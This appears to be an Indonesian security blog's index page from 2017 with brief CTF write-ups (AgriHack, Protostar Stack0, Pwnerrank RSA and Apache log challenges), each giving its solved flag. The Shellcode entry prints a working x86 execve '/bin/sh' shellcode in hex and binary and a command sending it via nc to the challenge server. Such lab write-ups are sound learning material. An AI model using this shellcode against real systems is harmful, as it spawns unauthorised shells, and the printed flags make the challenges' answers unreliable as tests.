Saturday, February 25, 2017

AgriHack : Kripto Xor (Lupa Nama Soal)

disini kita di beri 2 buah file, yang pertama adalah file pdf yang di enkripsi, dan yang kedua adalah program untuk enkripsi file terseb... thumbnail 1 summary

disini kita di beri 2 buah file, yang pertama adalah file pdf yang di enkripsi, dan yang kedua adalah program untuk enkripsi file tersebut,


terlihat di program enkripsi setiap byte dari file di XOR dengan key yang di dapat dari function os.urandom(1) yang di simpan ke variable randomku, beruntung key yang di gunakan hanya 1, sehingga sangat memungkinkan untuk kita bruteforce keynya, mari kita buat script untuk decrypt file tersebut, karena file di enkripsi cuman di xor dengan kunci, kita bisa melakukan decrypt hanya dengan sedikit memodifikasi program enkripsi..


setelah di jalankan kita akan mendapat 1 file pdf yang kita inginkan..


Flag : AGRI{do_y0u_3ven_bruteforce}

Tuesday, February 21, 2017

Protostar : Stack0

This level introduces the concept that memory can be accessed outside of its allocated region, how the stack variables are laid out, and ... thumbnail 1 summary

This level introduces the concept that memory can be accessed outside of its allocated region, how the stack variables are laid out, and that modifying outside of the allocated memory can modify program execution.




yeay..  variabel modified has been modified..\\m// \\0//

Saturday, February 18, 2017

Pwnerrank : RSA - Basic

Task : Challenge : Recover the original message M, use  www.factordb.com  to get p and q,  p =  15100118367560938297 q =   18238... thumbnail 1 summary
Task :
Challenge : Recover the original message M,
use www.factordb.com to get p and q, 

 p = 15100118367560938297
q =  18238194893394268367

 ok lets start to recover..

Pwnerrank : Apache Access Log

Kita di beri sebuah file access log dari service apache, yang mana dari clue soal memberi tahu kita kalau di server ada serangan Sql Inj... thumbnail 1 summary

Kita di beri sebuah file access log dari service apache, yang mana dari clue soal memberi tahu kita kalau di server ada serangan Sql Injection, mari kita analisa, silahkan teman teman buat script analisa sendiri, atau mau analisa manual juga gk apa, karena buat script juga awalnyo perlu di analisa hehe.. .

Kalo belum tahu apa itu sql injection monggo ke gugel dulu :), terutama untuk blind sql injection, 
karena attack based di log ini adalah blind sql injection.

 Log :
Script Convert from base10 to char :
?? => analysis by yourself :D

Thursday, February 16, 2017

AgriHack : Shellcode (Pwning)

nc ke kebon.agrihack.party 30003 disini kita di suruh memasukkan shellcode dalam bentuk biner, ok kita coba, disini saya... thumbnail 1 summary



nc ke kebon.agrihack.party 30003


disini kita di suruh memasukkan shellcode dalam bentuk biner, ok kita coba, disini saya menggunakan shell code dari shell-strom.org , petunjuk di soal data yang di kirim harus dalam bentuk biner, yaudah payload dari shellcode di atas kita ubah dulu dari hexa base16 ke biner,

payload = \x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80

biner= 001100011100100111110111111000010101000101101000001011110010111101110011011010000110100000101111011000100110100101101110100010011110001110110000000010111100110110000000
hasil disasmble payload menggunakan library dari pwntools :








kita coba aja dulu kirim payload ke program yang jalan,..







$ (python -c "print '001100011100100111110111111000010101000101101000001011110010111101110011011010000110100000101111011000100110100101101110100010011110001110110000000010111100110110000000'";cat -) | nc kebon.agrihack.party 30002











\\m// yeay..



flag : AGRI{shellcode_itu_keren_tapi_gw_gak_ngerti}




























AgriHack : Header (Basic)

















            gunakan curl dengan perintah -I ( i besar)         Flag : AGRI{flag_ada_di_header}   
thumbnail 1 summary





























gunakan curl dengan perintah -I ( i besar)















Flag : AGRI{flag_ada_di_header}




























AgriHack : So Easy (Basic)

















                Flag : AGRI{d3lic1ou5_0m}     
thumbnail 1 summary





































Flag : AGRI{d3lic1ou5_0m}
































AgriHack : Robots (Basic)

















      diberikan sebuah link kesebuah website (challs.agrihack.party) dengan clue " cari Robot yang ada di sini", penjelasan apa fu...
thumbnail 1 summary

















diberikan sebuah link kesebuah website (challs.agrihack.party) dengan clue " cari Robot yang ada di sini", penjelasan apa fungsi dari file robots.txt ini silahkan baca di sini ,



























flag : AGRI{RoBots_TXT_Is_not_seCurE}



















      

    










Subscribe to:
Posts (Atom)